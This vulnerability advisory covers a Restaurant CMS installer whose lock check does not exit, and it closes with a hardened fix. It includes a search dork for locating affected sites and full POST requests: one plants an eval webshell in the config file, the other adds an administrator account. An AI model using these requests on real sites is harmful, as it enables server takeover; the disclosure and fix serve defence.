Restaurant CMS getshell vulnerability

Published: 2013-01-04 Author: BHST Vulnerability type: code execution Keyword: inurl:index.php?m=shopcar

The problem is in the /install/index.php file. Once installation finishes, the program creates an install.lock file in its root directory, but the check in /install/index.php for install.lock is wrong.

[php]
<?php
if(file_exists("../install.lock"))
{
    header("Location: ../");//no exit here
}
//echo 'tst';exit;
require_once("init.php");
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
{
[/php]

As you can see, when install.lock exists, header() only sends a 302 redirect and the script does not exit, so the logic below still runs. This gives rise to at least two vulnerabilities.

1. getshell (very dangerous)

[php]
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
{
    $smarty->assign("step",1);
    $smarty->display("index.html");
}elseif($_REQUEST['step']==2)
{
    $mysql_host=trim($_POST['mysql_host']);
    $mysql_user=trim($_POST['mysql_user']);
    $mysql_pwd=trim($_POST['mysql_pwd']);
    $mysql_db=trim($_POST['mysql_db']);
    $tblpre=trim($_POST['tblpre']);
    $domain==trim($_POST['domain']);
    $str="<?php \r\n";
    $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
    $str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
    $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
    $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
    $str.='define("MYSQL_CHARSET","GBK");'."\r\n";
    $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
    $str.='define("DOMAIN","'.$domain.'");'."\r\n";
    $str.='define("SKINS","default");'."\r\n";
    $str.='?>';
    file_put_contents("../config/config.inc.php",$str);//writes the submitted data into a PHP file
[/php]

The code above writes the POSTed data straight into ../config/config.inc.php, so submitting the following POST request plants a one-line webshell:
-----------post----------
POST /canting/install/index.php?m=index&step=2 HTTP/1.1
Host: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.129/canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
Content-Type: application/x-www-form-urlencoded
Content-Length: 126

mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
---------post----------
But this method is dangerous: it leaves the site unable to run.

2. Add an administrator directly

[php]
elseif($_REQUEST['step']==5)
{
    if($_POST)
    {
        require_once("../config/config.inc.php");
        $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
        mysql_select_db(MYSQL_DB,$link);
        mysql_query("SET NAMES ".MYSQL_CHARSET );
        mysql_query("SET sql_mode=''");
        $adminname=trim($_POST['adminname']);
        $pwd1=trim($_POST['pwd1']);
        $pwd2=trim($_POST['pwd2']);
        if(empty($adminname))
        {
            echo "<script>alert('管理员不能为空');history.go(-1);</script>";
            exit();
        }
        if(($pwd1!=$pwd2) or empty($pwd1))
        {
            echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//no exit here either
        }
        mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//inserts an administrator directly
    }
[/php]

This lets us insert an administrator account directly; the request is as follows:
POST /canting/install/index.php?m=index&step=5 HTTP/1.1
Host: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.129/canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

adminname=qingshen&pwd1=qingshen&pwd2=qingshen
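Both issues above stem from the same root causes: the lock check does not terminate the script, and raw POST values are spliced into PHP source. As an added example (not the CMS's own code), here is a hardened version of that part of the installer: the redirect is followed by exit, and the config writer emits every value with var_export() so that a quote-breaking value like the mysql_host in the first request becomes an inert string literal. The function names and the __DIR__-relative paths are assumptions.

```php
<?php
// Added example, not the CMS's own code. Assumes the same file layout
// (../install.lock, ../config/config.inc.php) and define() names.

// 1. The lock check must stop the script: header() only queues a 302,
//    and the remaining installer code still runs unless we exit.
function abort_if_installed(string $lockFile): void
{
    if (file_exists($lockFile)) {
        header("Location: ../", true, 302);
        exit;                           // the exit the original lacks
    }
}

// 2. Never splice raw POST values into PHP source. var_export() produces a
//    correctly quoted string literal, so the mysql_host value from the
//    request above stays inert text inside the quotes.
function build_config(array $values): string
{
    $lines = ['<?php'];
    foreach ($values as $name => $value) {
        if (!preg_match('/^[A-Z_]+$/', $name)) {
            throw new InvalidArgumentException("bad constant name: $name");
        }
        $lines[] = sprintf('define(%s, %s);', var_export($name, true),
                           var_export((string) $value, true));
    }
    return implode("\r\n", $lines) . "\r\n";  // no closing PHP tag needed
}

abort_if_installed(__DIR__ . '/../install.lock');

if (($_REQUEST['step'] ?? '') === '2') {
    // The table prefix ends up in SQL, so whitelist its characters too.
    $tblpre = trim($_POST['tblpre'] ?? '');
    if (!preg_match('/^[A-Za-z0-9_]{1,20}$/', $tblpre)) {
        exit('invalid table prefix');
    }
    $config = build_config([
        'MYSQL_HOST'    => trim($_POST['mysql_host'] ?? ''),
        'MYSQL_USER'    => trim($_POST['mysql_user'] ?? ''),
        'MYSQL_PWD'     => trim($_POST['mysql_pwd'] ?? ''),
        'MYSQL_DB'      => trim($_POST['mysql_db'] ?? ''),
        'MYSQL_CHARSET' => 'GBK',
        'TABLE_PRE'     => $tblpre,
        'DOMAIN'        => trim($_POST['domain'] ?? ''),
        'SKINS'         => 'default',
    ]);
    file_put_contents(__DIR__ . '/../config/config.inc.php', $config, LOCK_EX);
}
```

The same missing exit applies to the password-mismatch branch of step 5; an exit() there stops the insert from running on bad input.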
